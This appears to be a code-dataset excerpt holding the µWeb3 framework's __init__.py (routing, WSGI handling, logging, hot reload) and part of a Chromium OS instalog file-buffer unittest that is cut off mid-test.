source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
__init__.py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
"""µWeb3 Framework"""
__version__ = '3.0'
# Standard modules
import configparser
import logging
import os
import re
import sys
from wsgiref.simple_server import make_server
import datetime
# Package modules
from . import pagemaker, request
# Package classes
from .response import Response, Redirect
from .pagemaker import PageMaker, decorators, WebsocketPageMaker, DebuggingPageMaker, LoginMixin
from .model import SettingsManager
from .libs.safestring import HTMLsafestring, JSONsafestring, JsonEncoder, Basesafestring
from importlib import reload
class Error(Exception):
  """Superclass used for inheritance and external exception handling."""


class ImmediateResponse(Exception):
  """Used to trigger an immediate response, foregoing the regular returns."""


class HTTPException(Error):
  """SuperClass for HTTP exceptions."""


class HTTPRequestException(HTTPException):
  """Exception for http request errors."""


class NoRouteError(Error):
  """The server does not know how to route this request."""


class Registry:
  """Something to hook stuff to.

  Plain attribute container shared across requests; uWeb.__init__ attaches a
  `logger` attribute to it and passes it along with each Request.
  """
class Router:
  """Maps request URLs to PageMaker handler methods."""

  def __init__(self, page_class):
    """Collects all PageMakers reachable from `page_class`.

    Arguments:
      @ page_class: PageMaker
        The application's main PageMaker. Its LoadModules() result plus the
        class itself form the pool that is searched for route handlers.
    """
    self.pagemakers = page_class.LoadModules()
    self.pagemakers.append(page_class)

  def router(self, routes):
    """Returns the first request handler that matches the request URL.

    The `routes` argument is an iterable of 2-tuples, each of which contain a
    pattern (regex) and the name of the handler to use for matching requests.
    Before returning the closure, all regexp are compiled, and handler methods
    are retrieved from the provided `page_class`.

    Arguments:
      @ routes: iterable of 2-tuples.
        Each tuple is a pair of `pattern` and `handler`, both are strings.
        Optionally a third element (request method, or tuple of methods) and a
        fourth element (host pattern) may be given.

    Returns:
      request_router: Configured closure that processes urls.
    """
    req_routes = []
    # Websocket pagemakers are only created at startup but can be bound to
    # multiple routes. To prevent creating a separate instance for each route
    # we cache instances by class name.
    websocket_pagemaker = {}
    for pattern, *details in routes:
      page_maker = None
      for pm in self.pagemakers:
        # Pick the first PageMaker that defines the requested handler method.
        if hasattr(pm, details[0]):
          page_maker = pm
          break
      if callable(pattern):
        # A callable 'pattern' registers a websocket handler instead of an
        # HTTP route; reuse the cached instance if this class was seen before.
        if not websocket_pagemaker.get(page_maker.__name__):
          websocket_pagemaker[page_maker.__name__] = page_maker()
        pattern(getattr(websocket_pagemaker[page_maker.__name__], details[0]))
        continue
      if not page_maker:
        raise NoRouteError(f"µWeb3 could not find a route handler called '{details[0]}' in any of the PageMakers, your application will not start.")
      if len(details) > 1:
        # Accept either a single method name or a tuple of method names.
        # (Bug fix: the old code called .upper() on tuples, which raised.)
        if isinstance(details[1], tuple):
          methods = tuple(m.upper() for m in details[1])
        else:
          methods = details[1].upper()
      else:
        methods = 'ALL'
      req_routes.append((re.compile(pattern + '$', re.UNICODE),
                         details[0],  # handler
                         methods,  # request method(s)
                         details[2].lower() if len(details) > 2 else '*',  # host
                         page_maker  # pagemaker class
                         ))

    def request_router(url, method, host):
      """Returns the appropriate handler and arguments for the given `url`.

      The `url` is matched against the compiled patterns in the `req_routes`
      provided by the outer scope. Upon finding a pattern that matches, the
      match groups from the regex and the unbound handler method are returned.

      N.B. The rules are such that the first matching route will be used. There
      is no further concept of specificity. Routes should be written with this
      in mind.

      Arguments:
        @ url: str
          The URL requested by the client.
        @ method: str
          The http method requested by the client.
        @ host: str
          The http host header value requested by the client.

      Raises:
        NoRouteError: None of the patterns match the requested `url`.

      Returns:
        4-tuple: handler name, generator of pattern matches, host match groups
        (or None), and the PageMaker class owning the handler.
      """
      for pattern, handler, routemethod, hostpattern, page_maker in req_routes:
        if routemethod != 'ALL':
          # Bug fix: tuple route methods previously never matched because the
          # follow-up `method != routemethod` compared a str to a tuple.
          if isinstance(routemethod, tuple):
            if method not in routemethod:
              continue
          elif method != routemethod:
            continue
        hostmatch = None
        if hostpattern != '*':
          # Bug fix: pattern and subject were swapped; compile the route's
          # host pattern and match it against the request's host value.
          hostmatch = re.compile(hostpattern + '$').match(host)
          if not hostmatch:
            # clearly not the host we were looking for
            continue
          hostmatch = hostmatch.groups()
        match = pattern.match(url)
        if match:
          # strip out optional groups, as they return '', which would override
          # the handlers default argument values later on in the page_maker
          groups = (group for group in match.groups() if group)
          return handler, groups, hostmatch, page_maker
      raise NoRouteError(url + ' cannot be handled')
    return request_router
class uWeb:
  """Returns a configured closure for handling page requests.

  This closure is configured with a precomputed set of routes and handlers
  using the Router function. After this, incoming requests are processed and
  delegated to the correct PageMaker handler.

  The url in the received `req` object is taken and matched against the
  `router` (refer to Router() for more documentation on this).

  Takes:
    @ page_class: PageMaker
      Class that holds request handling methods as defined in the `routes`
    @ router: request router
      The result of the Router() function.
    @ config: dict
      Configuration for the PageMaker. Typically contains entries for database
      connections, default search paths etc.

  Returns:
    RequestHandler: Configured closure that is ready to process requests.
  """

  def __init__(self, page_class, routes, executing_path=None, config='config'):
    # Directory the application runs from; falls back to this package's dir.
    self.executing_path = executing_path or os.path.dirname(__file__)
    self.config = SettingsManager(filename=config, path=self.executing_path)
    self.logger = self.setup_logger()
    # NOTE(review): attribute is spelled 'inital_pagemaker' (sic) throughout
    # this class; kept as-is since other methods reference this spelling.
    self.inital_pagemaker = page_class
    self.registry = Registry()
    self.registry.logger = logging.getLogger('root')
    self.router = Router(page_class).router(routes)
    self.setup_routing()
    # Encoders wrap response bodies in the matching safestring type so output
    # is escaped appropriately for its content type.
    self.encoders = {
        'text/html': lambda x: HTMLsafestring(x, unsafe=True),
        'text/plain': str,
        'application/json': lambda x: JSONsafestring(x, unsafe=True)}

  def __call__(self, env, start_response):
    """WSGI request handler.

    Accepts the WSGI `environment` dictionary and a function to start the
    response and returns a response iterator.
    """
    req = request.Request(env, self.registry)
    req.env['REAL_REMOTE_ADDR'] = request.return_real_remote_addr(req.env)
    response = None
    method = '_NotFound'
    args = None
    # NOTE(review): 'rollback' is assigned but never used in this method.
    rollback = False
    try:
      method, args, hostargs, page_maker = self.router(req.path,
                                                       req.env['REQUEST_METHOD'],
                                                       req.env['host'])
    except NoRouteError:
      # When we catch this error this means there is no method for the route
      # in the currently selected pagemaker. If this happens we default to the
      # initial pagemaker because we don't know what the target pagemaker
      # should be. Then we set an internalservererror and move on.
      page_maker = self.inital_pagemaker
    try:
      # instantiate the pagemaker for this request
      pagemaker_instance = page_maker(req,
                                      config=self.config,
                                      executing_path=self.executing_path)
      # specifically call _PreRequest as promised in documentation
      if hasattr(pagemaker_instance, '_PreRequest'):
        pagemaker_instance = pagemaker_instance._PreRequest()
      response = self.get_response(pagemaker_instance, method, args)
    except Exception:
      # something broke in our pagemaker_instance, lets fall back to the most
      # basic pagemaker for error output.
      # NOTE(review): if page_maker(...) itself raised, 'pagemaker_instance'
      # is unbound here and this hasattr() raises NameError — confirm and fix.
      if hasattr(pagemaker_instance, '_ConnectionRollback'):
        try:
          pagemaker_instance._ConnectionRollback()
        except:
          # Best-effort rollback; a failure here must not mask the original
          # error that is reported below.
          pass
      pagemaker_instance = PageMaker(req,
                                     config=self.config,
                                     executing_path=self.executing_path)
      response = pagemaker_instance.InternalServerError(*sys.exc_info())
    if method != 'Static':
      if not isinstance(response, Response):
        # Upgrade a bare return value to a full Response object.
        req.response.text = response
        response = req.response
      if not isinstance(response.text, Basesafestring):
        # make sure we always output Safe HTML if our content type is
        # something we should encode
        encoder = self.encoders.get(response.clean_content_type(), None)
        if encoder:
          response.text = encoder(response.text)
      if hasattr(pagemaker_instance, '_PostRequest'):
        pagemaker_instance._PostRequest()
    # CSP might be unneeded for some static content,
    # https://github.com/w3c/webappsec/issues/520
    if hasattr(pagemaker_instance, '_CSPheaders'):
      pagemaker_instance._CSPheaders()
    # provide users with a PostRequest method to override too
    if method != 'Static' and hasattr(pagemaker_instance, 'PostRequest'):
      response = pagemaker_instance.PostRequest(response)
    # we should at least send out something to make sure we are wsgi compliant.
    if not response.text:
      response.text = ''
    self._logging(req, response)
    start_response(response.status, response.headerlist)
    try:
      # Encode text responses; byte responses fall through to the except.
      yield response.text.encode(response.charset)
    except AttributeError:
      yield response.text

  def setup_logger(self):
    """Creates the file-based access logger used by _logging()."""
    logger = logging.getLogger('uweb3_logger')
    logger.setLevel(logging.INFO)
    fh = logging.FileHandler(os.path.join(self.executing_path, 'access_logging.log'))
    fh.setLevel(logging.INFO)
    logger.addHandler(fh)
    return logger

  def _logging(self, req, response):
    """Logs incoming requests to a logfile.

    This is enabled by default, even if its missing in the config file; it is
    only disabled by an explicit access_logging = False in [development].
    """
    if (self.config.options.get('development', None)
        and self.config.options['development'].get('access_logging',
                                                   True) == 'False'):
      return
    host = req.env['HTTP_HOST'].split(':')[0]
    date = datetime.datetime.now().strftime('%d/%m/%Y %H:%M:%S')
    method = req.method
    path = req.path
    status = response.httpcode
    protocol = req.env.get('SERVER_PROTOCOL')
    self.logger.info(f"""{host} - - [{date}] \"{method} {path} {status} {protocol}\"""")

  def get_response(self, page_maker, method, args):
    """Calls the resolved handler and returns its (error-wrapped) response.

    Arguments:
      @ page_maker: PageMaker instance for this request.
      @ method: str, name of the handler method to invoke.
      @ args: iterable of positional arguments extracted from the URL.
    """
    try:
      if method != 'Static':
        # We're specifically calling _PostInit here as promised in
        # documentation.
        # pylint: disable=W0212
        page_maker._PostInit()
      elif hasattr(page_maker, '_StaticPostInit'):
        # We're specifically calling _StaticPostInit here as promised in
        # documentation, separate from the regular PostInit to keep things
        # fast for static pages.
        page_maker._StaticPostInit()
      # pylint: enable=W0212
      return getattr(page_maker, method)(*args)
    except pagemaker.ReloadModules as message:
      # Hot-reload the module holding the initial pagemaker and report it.
      reload_message = reload(sys.modules[self.inital_pagemaker.__module__])
      return Response(content='%s\n%s' % (message, reload_message))
    except ImmediateResponse as err:
      # NOTE(review): indexing an exception (err[0]) is a TypeError on
      # Python 3; this presumably should be err.args[0] — confirm.
      return err[0]
    except Exception:
      if (self.config.options.get('development', False)
          and self.config.options['development'].get('error_logging',
                                                     True) == 'True'):
        logger = logging.getLogger('uweb3_exception_logger')
        fh = logging.FileHandler(os.path.join(self.executing_path, 'uweb3_uncaught_exceptions.log'))
        logger.addHandler(fh)
        logger.exception("UNCAUGHT EXCEPTION:")
      return page_maker.InternalServerError(*sys.exc_info())

  def serve(self):
    """Sets up and starts WSGI development server for the current app."""
    host = 'localhost'
    port = 8001
    hotreload = False
    dev = False
    interval = None
    ignored_directories = ['__pycache__',
                           self.inital_pagemaker.PUBLIC_DIR,
                           self.inital_pagemaker.TEMPLATE_DIR]
    if self.config.options.get('development', False):
      host = self.config.options['development'].get('host', host)
      port = self.config.options['development'].get('port', port)
      hotreload = self.config.options['development'].get('reload', False) in ('True', 'true')
      dev = self.config.options['development'].get('dev', False) in ('True', 'true')
      interval = int(self.config.options['development'].get('checkinterval', 0))
      # ignored_extensions is only defined here; hotreload can only be True
      # inside this branch as well, so the HotReload() call below is safe.
      ignored_extensions = self.config.options['development'].get('ignored_extensions', '').split(',')
      ignored_directories += self.config.options['development'].get('ignored_directories', '').split(',')
    server = make_server(host, int(port), self)
    print(f'Running µWeb3 server on http://{server.server_address[0]}:{server.server_address[1]}')
    print(f'Root dir is: {self.executing_path}')
    try:
      if hotreload:
        print(f'Hot reload is enabled for changes in: {self.executing_path}')
        HotReload(self.executing_path, interval=interval, dev=dev,
                  ignored_extensions=ignored_extensions,
                  ignored_directories=ignored_directories)
      server.serve_forever()
    except Exception as error:
      print(error)
      server.shutdown()

  def setup_routing(self):
    """Applies route configuration to the initial PageMaker."""
    if isinstance(self.inital_pagemaker, list):
      # A list means (PageMaker, route, route, ...): attach the routes to the
      # PageMaker class and unwrap it.
      routes = [route for route in self.inital_pagemaker[1:]]
      self.inital_pagemaker[0].AddRoutes(tuple(routes))
      self.inital_pagemaker = self.inital_pagemaker[0]
    default_route = "routes"
    automatic_detection = True
    if self.config.options.get('routing'):
      default_route = self.config.options['routing'].get('default_routing', default_route)
      automatic_detection = self.config.options['routing'].get('disable_automatic_route_detection', 'False') != 'True'
    if automatic_detection:
      self.inital_pagemaker.LoadModules(routes=default_route)
class HotReload:
  """This class handles the thread which scans for file changes in the
  execution path and restarts the server if needed."""

  IGNOREDEXTENSIONS = [".pyc", '.ini', '.md', '.html', '.log', '.sql']

  def __init__(self, path, interval=None, dev=False, ignored_extensions=None,
               ignored_directories=None):
    """Takes a path, an optional interval in seconds and an optional flag
    signaling a development environment which will set the path for new and
    changed file checking on the parent folder of the serving file.

    Arguments:
      @ path: str
        File or directory whose parent directory will be watched.
      % interval: int ~~ 1
        Seconds between scans for changes.
      % dev: bool ~~ False
        Watch two directory levels up instead (framework development mode).
      % ignored_extensions: list ~~ None
        Extra extensions to ignore, on top of IGNOREDEXTENSIONS.
      % ignored_directories: list ~~ None
        Directory-name fragments whose paths are skipped while scanning.
    """
    import threading
    self.running = threading.Event()
    self.interval = interval or 1
    self.path = os.path.dirname(path)
    self.ignoredextensions = self.IGNOREDEXTENSIONS + (ignored_extensions or [])
    # Bug fix: default to an empty list so Files() does not crash iterating
    # over None when no ignored directories are supplied.
    self.ignoreddirectories = ignored_directories or []
    if dev:
      from pathlib import Path
      self.path = str(Path(self.path).parents[1])
    self.thread = threading.Thread(target=self.Run)
    self.thread.daemon = True
    self.thread.start()

  def Run(self):
    """Method runs forever and watches all files in the project folder."""
    self.watched_files = self.Files()
    self.mtimes = [(f, os.path.getmtime(f)) for f in self.watched_files]
    import time
    while True:
      time.sleep(self.interval)
      new = self.Files(self.watched_files)
      if new:
        print('{color}New file added or deleted\x1b[0m \nRestarting µWeb3'.format(color='\x1b[7;30;41m'))
        self.Restart()
      for f, mtime in self.mtimes:
        try:
          changed = os.path.getmtime(f) != mtime
        except OSError:
          # Bug fix: a deleted watched file used to raise here and silently
          # kill the watcher thread; treat deletion as a change instead.
          changed = True
        if changed:
          print('{color}Detected changes in {file}\x1b[0m \nRestarting µWeb3'.format(color='\x1b[7;30;41m', file=f))
          self.Restart()

  def Files(self, current=None):
    """Returns all files inside the working directory of uweb3.

    Arguments:
      % current: set ~~ None
        Already-known files; only files absent from this set are returned.

    Returns:
      set: newly discovered, non-ignored file paths.
    """
    if not current:
      current = set()
    new = set()
    for dirpath, dirnames, filenames in os.walk(self.path):
      # Skip any directory whose path contains an ignored name fragment.
      if any(dirname in dirpath for dirname in self.ignoreddirectories):
        continue
      for file in filenames:
        fullname = os.path.join(dirpath, file)
        # Skip already-known files and editor backup files ('~' suffix).
        if fullname in current or fullname.endswith('~'):
          continue
        ext = os.path.splitext(file)[1]
        if ext not in self.ignoredextensions:
          new.add(fullname)
    return new

  def Restart(self):
    """Restart uweb3 with all provided system arguments."""
    self.running.clear()
    os.execl(sys.executable, sys.executable, *sys.argv)
|
buffer_simple_file_unittest.py | #!/usr/bin/env python3
#
# Copyright 2016 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unittests for simple file-based buffer."""
# TODO(kitching): Add tests that deal with "out of disk space" situations.
# TODO(kitching): Add tests for reading data from corrupted databases.
# - data.json is smaller than pos in metadata.json
# - metadata.json does not contain the right version
# - metadata.json is an empty dict {}
# - metadata.json does not exist
# - data.json does not exist
# - metadata recovery: uncorrupted data.json
# - metadata recovery: corruptions at the beginning of data.json
# - metadata recovery: corruptions at the end of data.json
# - metadata recovery: fully corrupted data.json
# - consumer metadata: seq smaller than first_seq
# - consumer metadata: seq larger than last_seq
# - consumer metadata: pos smaller than start_pos
# - consumer metadata: pos larger than end_pos
# - consumer metadata: pos not synchronized with seq
# - consumer metadata is an empty dict {}
# - consumer metadata missing cur_pos or cur_seq
# TODO(kitching): Add tests for failure during Truncate operation.
import collections
import functools
import logging
import os
import queue
import random
import shutil
import tempfile
import threading
import time
import unittest
from cros.factory.instalog import datatypes
from cros.factory.instalog import log_utils
from cros.factory.instalog import plugin_base
# pylint: disable=no-name-in-module
from cros.factory.instalog.plugins import buffer_file_common
from cros.factory.instalog.plugins import buffer_simple_file
from cros.factory.instalog.utils import file_utils
# pylint: disable=protected-access
def _WithBufferSize(buffer_size):
def ModifyFn(fn):
@functools.wraps(fn)
def Wrapper(*args, **kwargs):
old_buffer_size_bytes = (
buffer_simple_file.buffer_file_common._BUFFER_SIZE_BYTES)
buffer_simple_file.buffer_file_common._BUFFER_SIZE_BYTES = buffer_size
try:
fn(*args, **kwargs)
finally:
buffer_simple_file.buffer_file_common._BUFFER_SIZE_BYTES = (
old_buffer_size_bytes)
return Wrapper
return ModifyFn
class TestBufferSimpleFile(unittest.TestCase):
def _CreateBuffer(self, config=None):
# Remove previous temporary folder if any.
if self.data_dir is not None:
shutil.rmtree(self.data_dir)
self.data_dir = tempfile.mkdtemp(prefix='buffer_simple_file_unittest_')
logging.info('Create state directory: %s', self.data_dir)
self.sf = buffer_simple_file.BufferSimpleFile(
config={} if config is None else config,
logger_name=self.logger.name,
store={},
plugin_api=None)
self.sf.GetDataDir = lambda: self.data_dir
self.sf.SetUp()
self.e1 = datatypes.Event({'test1': 'event'})
self.e2 = datatypes.Event({'test22': 'event'})
self.e3 = datatypes.Event({'test333': 'event'})
self.e4 = datatypes.Event({'test4444': 'event'})
self.e5 = datatypes.Event({'test55555': 'event'})
def setUp(self):
self.logger = logging.getLogger('simple_file')
self.data_dir = None
self._CreateBuffer()
def tearDown(self):
shutil.rmtree(self.data_dir)
def testFormatParseRecord(self):
"""Tests internal format and parse of data.json record."""
SEQ = 1989
RECORD = '{1: "hello world"}'
FORMATED_RECORD = '[1989, {1: "hello world"}, "ea05f160"]\n'
self.assertEqual(FORMATED_RECORD,
buffer_file_common.FormatRecord(SEQ, RECORD))
seq, record = buffer_file_common.ParseRecord(
FORMATED_RECORD, self.logger.name)
self.assertEqual(SEQ, seq)
self.assertEqual(RECORD, record)
# TODO(chuntsen): Remove old format.
seq, record = buffer_file_common.ParseRecord(
'[1989, {1: "hello world"}, 15fa0ea0]\n', self.logger.name)
self.assertEqual(SEQ, seq)
self.assertEqual(RECORD, record)
# TODO(chuntsen): Remove legacy test.
seq, record = buffer_file_common.ParseRecord(
'[1989, {1: "hello world"}, "15fa0ea0"]\n', self.logger.name)
self.assertEqual(SEQ, seq)
self.assertEqual(RECORD, record)
def testAddRemoveConsumer(self):
"""Tests adding and removing a Consumer."""
self.assertEqual({}, self.sf.ListConsumers())
self.sf.AddConsumer('a')
self.assertEqual(['a'], list(self.sf.ListConsumers()))
self.sf.RemoveConsumer('a')
self.assertEqual({}, self.sf.ListConsumers())
def testWriteRead(self):
"""Tests writing and reading back an Event."""
self.sf.Produce([self.e1])
self.sf.AddConsumer('a')
stream = self.sf.Consume('a')
self.assertEqual(self.e1, stream.Next())
def testLongCorruptedRecord(self):
"""Tests reading from a data store with a long corrupted record."""
# Ensure that the size of the event is greater than _BUFFER_SIZE_BYTES.
# pylint: disable=protected-access
e = datatypes.Event(
{'data':
'x' * buffer_simple_file.buffer_file_common._BUFFER_SIZE_BYTES})
self.sf.Produce([e])
# Purposely corrupt the data file.
with open(self.sf.buffer_file.data_path, 'r+') as f:
f.seek(1)
f.write('x')
self.sf.Produce([self.e2])
self.sf.AddConsumer('a')
stream = self.sf.Consume('a')
self.assertEqual(self.e2, stream.Next())
def testSkippedRecords(self):
"""Tests recovery from skipped records due to corruption.
Previously (prior to this test), a bug existed where, after a corrupt record
was skipped, its length was not included in calculating "new_pos" for a
consumer when processing subsequent records.
To illustrate this bug, we design a situation where we have two "buffer
refills". The first one includes a garbage event (e2) which will be
dropped. Padding is inserted into event e to ensure that the last event e3
is pushed into buffer refill #2. Events are retrieved sequentially from
buffer refill #1. As long as len(e2) > len(e1), after retrieving the last
event from buffer refill #1, the consumer's new_pos will be set to a
location *before* the last event in buffer refill #1. Thus the next buffer
will include both e1 and e3.
|--------------refill buffer #1----------------||---refill buffer #2---|
[ e1 ] [ e2 GARBAGE ] [ e ] [ e1 ] [ e3 ]
To calculate buffer size needed in e:
-------- (doesn't count) ------- -------- +1 to push over "<" limit
The fix is to ensure that the length of any previous "garbage records" are
included in the stored "length" of any event in the buffer. E.g. in this
case, the length of e2(GARBAGE) would be included in the length of event e.
"""
self.sf.Produce([self.e1])
e1_end = os.path.getsize(self.sf.buffer_file.data_path)
self.sf.Produce([self.e2])
e2_end = os.path.getsize(self.sf.buffer_file.data_path)
# Corrupt event e2 by writing garbage at the end.
with open(self.sf.buffer_file.data_path, 'r+') as f:
f.seek(e2_end - 10)
f.write('x' * 5)
# pylint: disable=protected-access
# Ensure that both e and e1 are included in the first buffer refill. The
# length of e can be based off of that of e1 (same base payload).
bytes_left = (buffer_simple_file.buffer_file_common._BUFFER_SIZE_BYTES -
(e1_end * 3) + 1)
e = datatypes.Event({'test1': 'event' + ('x' * bytes_left)})
self.sf.Produce([e])
self.sf.Produce([self.e1])
self.sf.Produce([self.e3])
self.sf.AddConsumer('a')
stream = self.sf.Consume('a')
self.assertEqual(self.e1, stream.Next())
self.assertEqual(e, stream.Next())
self.assertEqual(self.e1, stream.Next())
self.assertEqual(self.e3, stream.Next())
def testAppendedJunkStore(self):
"""Tests reading from a data store that has appended junk."""
self.sf.Produce([self.e1])
# Purposely append junk to the data store
with open(self.sf.buffer_file.data_path, 'a') as f:
f.write('xxxxxxxx')
self.sf.Produce([self.e2])
self.sf.AddConsumer('a')
stream = self.sf.Consume('a')
self.assertEqual(self.e1, stream.Next())
self.assertEqual(self.e2, stream.Next())
def testTwoBufferEventStreams(self):
"""Tries creating two BufferEventStream objects for one Consumer."""
self.sf.AddConsumer('a')
stream1 = self.sf.Consume('a')
stream2 = self.sf.Consume('a')
self.assertIsInstance(stream1, plugin_base.BufferEventStream)
self.assertEqual(stream2, None)
def testUseExpiredBufferEventStream(self):
"""Tests continuing to use an expired BufferEventStream."""
self.sf.AddConsumer('a')
stream = self.sf.Consume('a')
stream.Commit()
with self.assertRaises(plugin_base.EventStreamExpired):
stream.Next()
with self.assertRaises(plugin_base.EventStreamExpired):
stream.Abort()
with self.assertRaises(plugin_base.EventStreamExpired):
stream.Commit()
def testFirstLastSeq(self):
"""Checks the proper tracking of first_seq and last_seq."""
self.assertEqual(self.sf.buffer_file.first_seq, 1)
self.assertEqual(self.sf.buffer_file.last_seq, 0)
first_seq, _ = self.sf.buffer_file._GetFirstUnconsumedRecord()
self.assertEqual(first_seq, 1)
self.sf.buffer_file.Truncate()
self.assertEqual(self.sf.buffer_file.first_seq, 1)
self.assertEqual(self.sf.buffer_file.last_seq, 0)
first_seq, _ = self.sf.buffer_file._GetFirstUnconsumedRecord()
self.assertEqual(first_seq, 1)
self.sf.Produce([self.e1])
self.assertEqual(self.sf.buffer_file.first_seq, 1)
self.assertEqual(self.sf.buffer_file.last_seq, 1)
first_seq, _ = self.sf.buffer_file._GetFirstUnconsumedRecord()
self.assertEqual(first_seq, 2)
self.sf.Produce([self.e1])
self.assertEqual(self.sf.buffer_file.first_seq, 1)
self.assertEqual(self.sf.buffer_file.last_seq, 2)
first_seq, _ = self.sf.buffer_file._GetFirstUnconsumedRecord()
self.assertEqual(first_seq, 3)
def testTruncate(self):
"""Checks that Truncate truncates up to the last unread event."""
self.sf.AddConsumer('a')
self.assertEqual(self.sf.buffer_file.first_seq, 1)
self.assertEqual(self.sf.buffer_file.last_seq, 0)
self.sf.Produce([self.e1, self.e2])
self.assertEqual(self.sf.buffer_file.first_seq, 1)
self.assertEqual(self.sf.buffer_file.last_seq, 2)
self.sf.buffer_file.Truncate()
self.assertEqual(self.sf.buffer_file.first_seq, 1)
self.assertEqual(self.sf.buffer_file.last_seq, 2)
stream = self.sf.Consume('a')
self.assertEqual(self.e1, stream.Next())
stream.Commit()
self.sf.buffer_file.Truncate()
self.assertEqual(self.sf.buffer_file.first_seq, 2)
self.assertEqual(self.sf.buffer_file.last_seq, 2)
def testSeqOrder(self):
"""Checks that the order of sequence keys is consistent."""
self.sf.AddConsumer('a')
self.sf.buffer_file.Truncate()
self.sf.Produce([self.e1])
stream = self.sf.Consume('a')
seq, _ = stream._Next()
self.assertEqual(seq, 1)
stream.Commit()
self.sf.buffer_file.Truncate()
self.sf.Produce([self.e1, self.e1])
stream = self.sf.Consume('a')
seq, _ = stream._Next()
self.assertEqual(seq, 2)
seq, _ = stream._Next()
self.assertEqual(seq, 3)
stream.Commit()
@_WithBufferSize(0) # Force only keeping one record in buffer.
def testReloadBufferAfterTruncate(self):
"""Tests re-loading buffer of a BufferEventStream after Truncate."""
self.sf.AddConsumer('a')
self.sf.Produce([self.e1, self.e2, self.e3])
stream1 = self.sf.Consume('a')
self.assertEqual(self.e1, stream1.Next())
stream1.Commit()
stream2 = self.sf.Consume('a')
# Explicitly check that stream2's buffer only contains one item. This
# means the buffer will need to be reloaded after the following sequence
# of Next and Truncate.
self.assertEqual(1, len(stream2._Buffer()))
self.assertEqual(self.e2, stream2.Next())
self.sf.buffer_file.Truncate()
self.assertEqual(self.e3, stream2.Next())
stream2.Commit()
def testRecreateConsumer(self):
"""Tests for same position after removing and recreating Consumer."""
self.sf.Produce([self.e1, self.e2, self.e3])
self.sf.AddConsumer('a')
stream1 = self.sf.Consume('a')
self.assertEqual(self.e1, stream1.Next())
stream1.Commit()
self.sf.RemoveConsumer('a')
self.sf.AddConsumer('a')
stream2 = self.sf.Consume('a')
self.assertEqual(self.e2, stream2.Next())
stream2.Commit()
def testRecreateConsumerAfterTruncate(self):
"""Tests that recreated Consumer updates position after truncate."""
self.sf.Produce([self.e1, self.e2, self.e3])
self.sf.AddConsumer('a')
stream1 = self.sf.Consume('a')
self.assertEqual(self.e1, stream1.Next())
stream1.Commit()
self.sf.RemoveConsumer('a')
self.sf.AddConsumer('b')
stream2 = self.sf.Consume('b')
self.assertEqual(self.e1, stream2.Next())
self.assertEqual(self.e2, stream2.Next())
stream2.Commit()
self.sf.buffer_file.Truncate()
# Verify that the metadata is consistent after running Truncate.
self.sf.SetUp()
self.sf.AddConsumer('a')
stream3 = self.sf.Consume('a')
# Skips self.e2, since Truncate occurred while Consumer 'a' did not exist.
self.assertEqual(self.e3, stream3.Next())
stream3.Commit()
def testMultiThreadProduce(self):
"""Tests for correct output with multiple threads Producing events."""
random.seed(0)
def ProducerThread():
# Random sleep so that each thread produce isn't in sync.
time.sleep(random.randrange(3) * 0.1)
for unused_i in range(10):
self.sf.Produce([self.e1, self.e2, self.e3])
threads = []
for unused_i in range(10):
t = threading.Thread(target=ProducerThread)
threads.append(t)
t.start()
for t in threads:
t.join()
# 10 threads, 10 * 3 events each = expected 300 events, 100 of each type.
self.sf.AddConsumer('a')
stream = self.sf.Consume('a')
cur_seq = 1
record_count = collections.defaultdict(int)
while True:
seq, record = stream._Next()
if not seq:
break
# Make sure the sequence numbers are correct.
self.assertEqual(cur_seq, seq)
cur_seq += 1
record_count[record] += 1
self.assertEqual(3, len(record_count))
self.assertTrue(all([x == 100 for x in record_count.values()]))
@_WithBufferSize(80) # Each line is around ~35 characters.
def testMultiThreadConsumeTruncate(self):
"""Tests multiple Consumers reading simultaneously when Truncate occurs."""
record_count_queue = queue.Queue()
def ConsumerThread(consumer_id):
stream = self.sf.Consume(consumer_id)
record_count = collections.defaultdict(int)
count = 0
while True:
# Commit and start a new BufferEventStream every 10 events.
if count % 10 == 0:
logging.info('Committing after 10 events...')
stream.Commit()
stream = self.sf.Consume(consumer_id)
event = stream.Next()
if not event:
break
record_count[repr(event.payload)] += 1
count += 1
stream.Commit()
record_count_queue.put(record_count)
self.sf.Produce([self.e1, self.e2, self.e3] * 25)
for i in range(2):
self.sf.AddConsumer(str(i))
threads = []
for i in range(2):
t = threading.Thread(target=ConsumerThread, args=(str(i),))
threads.append(t)
t.start()
for t in threads:
while t.isAlive():
# Add a small sleep to prevent occupying read_lock
time.sleep(0.01)
self.sf.buffer_file.Truncate()
t.join()
self.sf.buffer_file.Truncate()
self.assertEqual(25 * 3 + 1, self.sf.buffer_file.first_seq)
while not record_count_queue.empty():
record_count = record_count_queue.get()
self.assertEqual(3, len(record_count))
self.assertTrue(all([x == 25 for x in record_count.values()]))
def _CountAttachmentsInBuffer(self, sf):
return len(os.listdir(sf.buffer_file.attachments_dir))
def _TestAttachment(self, with_copy):
"""Helper function to test basic attachment functionality."""
FILE_STRING = 'Hello World!'
self._CreateBuffer({'copy_attachments': with_copy})
with file_utils.UnopenedTemporaryFile() as path:
with open(path, 'w') as f:
f.write(FILE_STRING)
self.assertTrue(os.path.isfile(path))
event = datatypes.Event({}, {'a': path})
self.assertEqual(True, self.sf.Produce([event]))
self.assertTrue(os.path.isfile(path) == with_copy)
# Get the event out of buffer to verify that the internal
# attachment exists.
self.sf.AddConsumer('a')
stream = self.sf.Consume('a')
internal_event = stream.Next()
internal_path = internal_event.attachments['a']
self.assertEqual(FILE_STRING, file_utils.ReadFile(internal_path))
# Ensure that an absolute path is returned.
self.assertTrue(internal_path.startswith('/'))
self.assertEqual(1, self._CountAttachmentsInBuffer(self.sf))
def testCopyAttachment(self):
"""Tests that an attachment is properly copied into the buffer state."""
self._TestAttachment(True)
def testMoveAttachment(self):
"""Tests that an attachment is properly moved into the buffer state."""
self._TestAttachment(False)
def testNonExistentAttachment(self):
"""Tests behaviour when a non-existent attachment is provided."""
event = datatypes.Event({}, {'a': '/tmp/non_existent_file'})
self.assertEqual(False, self.sf.Produce([event]))
self.assertEqual(0, self._CountAttachmentsInBuffer(self.sf))
def testPartFailMoveAttachmentTwoEvents(self):
"""Tests moving two attachments in separate events (real and fake)."""
self._CreateBuffer({'copy_attachments': False})
with file_utils.UnopenedTemporaryFile() as path:
real_event = datatypes.Event({}, {'a': path})
fake_event = datatypes.Event({}, {'a': '/tmp/non_existent_file'})
